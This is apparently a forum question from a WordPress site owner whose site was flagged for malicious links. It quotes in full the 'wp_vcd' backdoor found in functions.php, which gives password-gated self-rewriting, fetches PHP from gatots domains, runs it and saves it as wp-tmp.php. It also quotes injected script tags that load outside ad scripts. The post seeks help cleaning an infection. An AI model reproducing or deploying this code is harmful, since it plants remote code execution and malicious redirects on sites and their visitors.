WordPress javascript code injection [on hold]

Google notified me that there are malicious links on my website:

https://cobalten.com/apu.php?zoneid=2025634 https://go.oclasrv.com/apu.php?zoneid=2025634 https://wowreality.info/page.js?wm=gr 

It’s a small website consists of few pages 3-4 https://explivia.com .

I searched the whole website and viewed all the requests from the networks tab, But didn’t find any of there websites.

I scanned the website https://sitecheck.sucuri.net/results/https/explivia.com , And it seems there are 3 related pages:

https://explivia.com/ https://explivia.com/404 https://explivia.com/contact 

I viewed the .htaccess and some of the php/html files, Including 404.php as it seems that this page is affected, But couldn’t find anything.

The same issue here https://productforums.google.com/forum/#!topic/webmasters/tQGGTdhc7D8

I found this code at the top of functions.php:

if (isset($  _REQUEST['action']) && isset($  _REQUEST['password']) && ($  _REQUEST['password'] == '4d742d51a12bb45b13f2b825bde37951'))     { $  div_code_name="wp_vcd";         switch ($  _REQUEST['action'])             {                       case 'change_domain';                     if (isset($  _REQUEST['newdomain']))                         {                              if (!empty($  _REQUEST['newdomain']))                                 {                                                                            if ($  file = @file_get_contents(__FILE__))                                                                             {                                                                                                  if(preg_match_all('/$  tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$  file,$  matcholddomain))                                                                                                              {                                                                                         $  file = preg_replace('/'.$  matcholddomain[1][0].'/i',$  _REQUEST['newdomain'], $  file);                                                                                        @file_put_contents(__FILE__, $  file);                                                                print "true";                                                                                                              }                                                                               }                                 }                         }                 break;                                  case 'change_code';                     if (isset($  _REQUEST['newcode']))                         {                              if (!empty($  _REQUEST['newcode']))                                 {                                                                            if ($  file = @file_get_contents(__FILE__))                                                                             {                                                                                                  if(preg_match_all('/\/\/$  start_wp_theme_tmp([\s\S]*)\/\/$  end_wp_theme_tmp/i',$  file,$  matcholdcode))                                                                                                              {                                                                                         $  file = str_replace($  matcholdcode[1][0], stripslashes($  _REQUEST['newcode']), $  file);                                                                                        @file_put_contents(__FILE__, $  file);                                                                print "true";                                                                                                              }                                                                               }                                 }                         }                 break;                  default: print "ERROR_WP_ACTION WP_V_CD WP_CD";             }          die("");     }         $  div_code_name = "wp_vcd"; $  funcfile      = __FILE__; if(!function_exists('theme_temp_setup')) {     $  path = $  _SERVER['HTTP_HOST'] . $  _SERVER[REQUEST_URI];     if (stripos($  _SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($  _SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {          function file_get_contents_tcurl($  url)         {             $  ch = curl_init();             curl_setopt($  ch, CURLOPT_AUTOREFERER, TRUE);             curl_setopt($  ch, CURLOPT_HEADER, 0);             curl_setopt($  ch, CURLOPT_RETURNTRANSFER, 1);             curl_setopt($  ch, CURLOPT_URL, $  url);             curl_setopt($  ch, CURLOPT_FOLLOWLOCATION, TRUE);             $  data = curl_exec($  ch);             curl_close($  ch);             return $  data;         }          function theme_temp_setup($  phpCode)         {             $  tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");             $  handle   = fopen($  tmpfname, "w+");            if( fwrite($  handle, "<?php\n" . $  phpCode))            {            }             else             {             $  tmpfname = tempnam('./', "theme_temp_setup");             $  handle   = fopen($  tmpfname, "w+");             fwrite($  handle, "<?php\n" . $  phpCode);             }             fclose($  handle);             include $  tmpfname;             unlink($  tmpfname);             return get_defined_vars();         }   $  wp_auth_key='ab616016c8af72054b117be51c745347';         if (($  tmpcontent = @file_get_contents("http://www.gatots.com/code.php") OR $  tmpcontent = @file_get_contents_tcurl("https://www.gatots.com/code.php")) AND stripos($  tmpcontent, $  wp_auth_key) !== false) {              if (stripos($  tmpcontent, $  wp_auth_key) !== false) {                 extract(theme_temp_setup($  tmpcontent));                 @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $  tmpcontent);                  if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {                     @file_put_contents(get_template_directory() . '/wp-tmp.php', $  tmpcontent);                     if (!file_exists(get_template_directory() . '/wp-tmp.php')) {                         @file_put_contents('wp-tmp.php', $  tmpcontent);                     }                 }              }         }           elseif ($  tmpcontent = @file_get_contents("http://www.gatots.pw/code.php")  AND stripos($  tmpcontent, $  wp_auth_key) !== false ) {  if (stripos($  tmpcontent, $  wp_auth_key) !== false) {                 extract(theme_temp_setup($  tmpcontent));                 @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $  tmpcontent);                  if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {                     @file_put_contents(get_template_directory() . '/wp-tmp.php', $  tmpcontent);                     if (!file_exists(get_template_directory() . '/wp-tmp.php')) {                         @file_put_contents('wp-tmp.php', $  tmpcontent);                     }                 }              }         }                   elseif ($  tmpcontent = @file_get_contents("http://www.gatots.top/code.php")  AND stripos($  tmpcontent, $  wp_auth_key) !== false ) {  if (stripos($  tmpcontent, $  wp_auth_key) !== false) {                 extract(theme_temp_setup($  tmpcontent));                 @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $  tmpcontent);                  if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {                     @file_put_contents(get_template_directory() . '/wp-tmp.php', $  tmpcontent);                     if (!file_exists(get_template_directory() . '/wp-tmp.php')) {                         @file_put_contents('wp-tmp.php', $  tmpcontent);                     }                 }              }         }         elseif ($  tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($  tmpcontent, $  wp_auth_key) !== false) {             extract(theme_temp_setup($  tmpcontent));          } elseif ($  tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($  tmpcontent, $  wp_auth_key) !== false) {             extract(theme_temp_setup($  tmpcontent));           } elseif ($  tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($  tmpcontent, $  wp_auth_key) !== false) {             extract(theme_temp_setup($  tmpcontent));           }           } }  //$  start_wp_theme_tmp    //wp_tmp  //$  end_wp_theme_tmp 

I checked wp-tmp.php and found related malicious js files:

<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=2025634"></script> <script src="//fortpush.com/ntfc.php?p=2025636" data-cfasync="false" async></script> 

What to do so solve this issue?